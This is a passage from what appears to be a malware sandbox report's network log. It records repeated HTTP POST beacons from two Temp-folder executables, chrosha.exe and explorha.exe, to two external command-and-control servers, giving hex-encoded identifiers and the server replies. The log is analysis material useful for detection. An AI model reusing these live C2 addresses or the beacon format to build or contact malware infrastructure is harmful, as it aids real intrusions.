                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:01.268307924 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1097 | 192.168.2.5 | 50951 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:01.100188971 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:01.348388910 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1098 | 192.168.2.5 | 50952 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:01.518978119 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:01.770422935 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1099 | 192.168.2.5 | 50953 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:01.718998909 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:01.968749046 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1100 | 192.168.2.5 | 50954 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:02.130039930 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:02.373423100 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1101 | 192.168.2.5 | 50955 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:02.222477913 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:02.477087975 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1102 | Source IP: 192.168.2.5 | Source Port: 50956 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:35:02.624942064 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:35:02.874572992 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1103 | Source IP: 192.168.2.5 | Source Port: 50957 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:35:02.839169979 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:35:03.088778019 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 1104 | Source IP: 192.168.2.5 | Source Port: 50958 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:35:03.231445074 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:35:03.479222059 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 1105 | Source IP: 192.168.2.5 | Source Port: 50959 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:35:03.339375973 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:35:03.590373039 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1106 | Source IP: 192.168.2.5 | Source Port: 50960 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:35:03.725970984 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:35:03.969096899 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 1107 | Source IP: 192.168.2.5 | Source Port: 50961 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:35:03.943883896 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:35:04.182239056 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 1108 | Source IP: 192.168.2.5 | Source Port: 50962 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:35:04.320468903 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:04.567733049 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1109 | 192.168.2.5 | 50963 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:04.432075024 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:04.682537079 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1110 | 192.168.2.5 | 50964 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:04.820662975 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:05.073395014 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1111 | 192.168.2.5 | 50965 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:05.039714098 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:05.282474995 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1112 | 192.168.2.5 | 50966 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:05.430577993 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:05.678369999 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1113 | 192.168.2.5 | 50967 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:05.541215897 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:05.794059992 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1114 | 192.168.2.5 | 50968 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:05.928894043 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
